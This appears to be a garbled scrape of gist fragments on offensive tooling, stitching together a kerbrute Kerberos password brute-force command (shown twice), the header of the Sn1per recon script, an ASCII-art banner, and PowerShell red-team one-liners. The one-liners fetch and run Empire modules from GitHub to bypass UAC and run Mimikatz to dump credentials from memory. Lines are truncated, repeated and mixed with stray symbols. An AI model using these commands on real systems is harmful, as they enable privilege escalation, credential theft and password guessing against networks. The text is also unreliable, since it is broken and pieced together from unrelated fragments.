With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
#!/bin/bash | |
# + -- --=[Sn1per by 1N3@CrowdShield | |
# + -- --=[http://crowdshield.com | |
# | |
VER="4.4" | |
BROWSER="firefox" # SET DEFAULT BROWSER | |
INSTALL_DIR="/usr/share/sniper" | |
PLUGINS_DIR="/usr/share/sniper/plugins" | |
CMSMAP="/usr/share/sniper/plugins/CMSmap/cmsmap.py" |
#!/bin/sh | |
# | |
# `7MN. `7MF' | |
# __, MMN. M | |
#`7MM M YMb M pd""b. | |
# MM M `MN. M (O) `8b | |
# MM M `MM.M ,89 | |
# MM M YMM ""Yb. | |
#.JMML..JML. YM 88 | |
# (O) .M' |
# Description: | |
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
# Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Import Mimikatz Module to run further commands |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
. | |
.. | |
........ | |
@ | |
* | |
*.* | |
*.*.* | |
🎠|